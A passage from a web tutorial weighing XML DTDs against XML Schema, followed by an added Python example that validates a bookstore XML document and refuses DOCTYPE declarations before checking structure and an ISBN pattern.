    This is just a simple example, but it should give you a taste of the many things you can do to control the content of an attribute or an element. You have far more control over what is considered a valid XML document using a schema. You can even
    • extend your types from other types you’ve created,
    • require uniqueness within scope, and
    • provide lookups.
    It’s a nicely object oriented approach. You could build a library of complexTypes and simpleTypes for re-use throughout many projects, and even find other definitions of common types (such as an "address", for example) from the Internet and use these to provide powerful definitions of your XML documents.
    DTD vs XML Schema
    The DTD provides a basic grammar for defining an XML Document in terms of the metadata that comprise the shape of the document. An XML Schema provides this, plus a detailed way to define what the data can and cannot contain. It provides far more control for the developer over what is legal, and it provides an Object Oriented approach, with all the benefits this entails.

    So, if XML Schemas provide an Object Oriented approach to defining an XML document’s structure, and if XML Schemas give us the power to define re-useable types such as an ISBN number based on a wide range of pre-defined types, why would we use a DTD? There are in fact several good reasons for using the DTD instead of the schema.
    Firstly, and rather an important point, is that XML Schema is a new technology. This means that whilst some XML Parsers support it fully, many still don’t. If you use XML to communicate with a legacy system, perhaps it won’t support the XML Schema.
    Many systems’ interfaces are already defined as a DTD. They are mature definitions, rich and complex. The effort in re-writing the definition may not be worthwhile.
    DTD is also established, and examples of common objects defined in a DTD abound on the Internet — freely available for re-use. A developer may be able to use these to define a DTD more quickly than they would be able to accomplish a complete re-development of the core elements as a new schema.
    Finally, you must also consider the fact that the XML Schema is an XML document. It has an XML Namespace to refer to, and an XML DTD to define it. This is all overhead. When a parser examines the document, it may have to link this all in, interpret the DTD for the Schema, load the namespace, and validate the schema, etc., all before it can parse the actual XML document in question. If you’re using XML as a protocol between two systems that are in heavy use, and need a quick response, then this overhead may seriously degrade performance.

    Then again, if your system is available for third party developers as a Web service, then the detailed enforcement of the XML Schema may protect your application a lot more effectively from malicious — or just plain bad — XML packets. As an example, Muse.net is an interesting technology. They have a publicly-available SOAP API defined with an XML Schema that provides their developers more control over what they receive from the user community.
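
    The in-code checks that the DTD section says you still need, combined with the strict intake this paragraph credits to schemas, as an added Python example (not from the original article). It refuses any DOCTYPE, so a SYSTEM reference such as http://webserver/bookstore.dtd is never followed on untrusted input, then enforces the bookstore structure and the isbnType pattern by hand. The function names and sample documents are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Same constraint as the page's isbnType: three groups of three digits.
ISBN_RE = re.compile(r"[0-9]{3}-[0-9]{3}-[0-9]{3}")

def refuse_doctype(data: bytes) -> None:
    """Pre-pass that stops at any DOCTYPE, so no inline or external DTD is honoured."""
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise ValueError(f"DOCTYPE not accepted (system id: {system_id!r})")
    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)

def validate_bookstore(data: bytes) -> list:
    """Return the list of violations; an empty list means the document is accepted."""
    try:
        refuse_doctype(data)
        root = ET.fromstring(data)
    except (ValueError, expat.ExpatError, ET.ParseError) as exc:
        return [f"rejected: {exc}"]
    if root.tag != "bookstore":
        return [f"root element is <{root.tag}>, expected <bookstore>"]
    errors = []
    tags = [child.tag for child in root]
    if tags[:1] != ["name"] or len(tags) < 2 or set(tags[1:]) != {"topic"}:
        errors.append("bookstore must be: name, then one or more topic")
    for topic in root.findall("topic"):
        ttags = [child.tag for child in topic]
        if ttags[:1] != ["name"] or set(ttags[1:]) - {"book"}:
            errors.append("topic must be: name, then zero or more book")
        for book in topic.findall("book"):
            if [child.tag for child in book] != ["title", "author"]:
                errors.append("book must be: title, author")
            isbn = book.get("isbn")  # optional attribute, as in the page's schema
            if isbn is not None and not ISBN_RE.fullmatch(isbn):
                errors.append(f"isbn {isbn!r} does not match NNN-NNN-NNN")
    return errors

# Constructed sample input, modelled on the page's bookstore document.
BODY = (b"<bookstore><name>Mike's Store</name><topic><name>XML</name>"
        b'<book isbn="%s"><title>Guide</title><author>Mike Jervis</author></book>'
        b"</topic></bookstore>")
GOOD = b'<?xml version="1.0"?>' + BODY % b"123-456-789"
BAD_ISBN = b'<?xml version="1.0"?>' + BODY % b"12a-456-789"
EXTERNAL_DTD = (b'<?xml version="1.0"?>'
                b'<!DOCTYPE bookstore SYSTEM "http://webserver/bookstore.dtd">'
                + BODY % b"123-456-789")

if __name__ == "__main__":
    for label, doc in (("good", GOOD), ("bad isbn", BAD_ISBN), ("external DTD", EXTERNAL_DTD)):
        print(label, "->", validate_bookstore(doc) or "accepted")
```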

    Saturday, August 13, 2011